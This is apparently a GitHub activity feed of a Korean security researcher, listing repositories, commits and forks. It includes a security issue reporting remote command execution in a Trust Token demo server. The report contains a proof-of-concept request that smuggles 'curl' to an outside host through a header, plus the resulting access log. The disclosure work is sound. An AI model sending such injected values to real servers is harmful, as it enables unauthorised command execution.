Park Jung-hwan AhnMo Korea, Republic of http://pagez.kr/ https://fb.me/ahnmo.park

spostman/ppp-ccs2018 18

An investigative study on the security and privacy aspects of Progressive Web Apps

ryuneeee/wsd_linebot 2

JavaScript document type LINE bot based on a Node.js sandbox VM.

AhnMo/aosp_build 0

AOSP Build system compatible version of Open GApps

AhnMo/CoinHive-blocker 0

Clone of CoinHive-blocker. For evaluation.

push event AhnMo/ahnmo.github.io

Junghwan Park

commit sha 1c73ed4d1d3e3f89eb9d85e75b4912423f1c48d1

Temp

push time in a month

create branch AhnMo/ahnmo.github.io

branch : cf

created branch time in a month

delete branch AhnMo/ahnmo.github.io

delete branch : verify

delete time in a month

delete branch AhnMo/ahnmo.github.io

delete branch : gh-pages

delete time in a month

push event AhnMo/ahnmo.github.io

Junghwan Park

commit sha cb0d2a8de0eea259e3dab7b45174fbd677f4e321

Update _config.yml

push time in a month

push event AhnMo/ahnmo.github.io

Junghwan Park

commit sha 43703d8986286363348b27a287047e13a0800f34

Update _config.yml

Junghwan Park

commit sha 546a98385dcd49e16700241372c2a1f049f9163c

Merge branch 'gh-pages' of github.com:AhnMo/ahnmo.github.io into gh-pages

push time in a month

push event AhnMo/ahnmo.github.io

Junghwan Park

commit sha 2d737a51c723a26719242c2a27418d686dcddd23

temp

push time in a month

push event AhnMo/ahnmo.github.io

Junghwan Park

commit sha 34c3ec21b92d2e844adf9daaed81abb1808d0f46

temp

push time in a month

create branch AhnMo/ahnmo.github.io

branch : verify

created branch time in a month

push event AhnMo/ahnmo.github.io

Park Jung-hwan

commit sha 3c80247c1c07036be2d0ddb8c41753a018607e50

Rename .well-known/cf-2fa-verify.txt to .nojekyll/.well-known/cf-2fa-verify.txt

push time in a month

push event AhnMo/ahnmo.github.io

Park Jung-hwan

commit sha 2a28d64ec0c099e985b10b412893b8a6270f54ca

Update _config.yml

Park Jung-hwan

commit sha f66c428af84dfba50c6ba1364f75c9878f206ed4

Update resume.html

Park Jung-hwan

commit sha 06adf4d0a1eea3ae85aee1d5ab3ab19533ca441b

Create cf-2fa-verify.txt

push time in a month

push event AhnMo/ahnmo.github.io

Park Jung-hwan

commit sha 06adf4d0a1eea3ae85aee1d5ab3ab19533ca441b

Create cf-2fa-verify.txt

push time in a month

fork AhnMo/password-cracking

This details how I create and use my password cracking setup

fork in a month

started Firework471/ClickScanner

started time in a month

issue opened JackJey/trust-token-issuer-demo

Security Report - Remote Command Execution

Overview

I tried to test the Trust Token API; however, I found a remote command execution point and confirmed it. The server could be abused through this, so you need to fix it by using execFile instead of exec.

Vulnerable code

https://github.com/JackJey/trust-token-issuer-demo/blob/544e0b2f5d2e77be573acb7d525294d2507cb230/server.js#L51

Reproduction steps

  • Request as below:
POST /.well-known/trust-token/issuance HTTP/2
Host: trust-token-issuer-demo.glitch.me
Sec-Trust-Token: 123; curl http://alice.pagez.kr

  • curl http://alice.pagez.kr is executed, and I found the access log as below:
54.174.102.90 - - [29/Sep/2021:07:38:04 +0000] "GET / HTTP/1.1" 200 3106 "-" "curl/7.47.0"

created time in 2 months

started WOOSEUNGHOON/V0Finder-public

started time in 3 months

fork AhnMo/www-project-web-security-testing-guide

The Web Security Testing Guide (WSTG) Project produces the premier cybersecurity testing resource for web application developers and security professionals.

https://owasp.org/www-project-web-security-testing-guide/

fork in 3 months
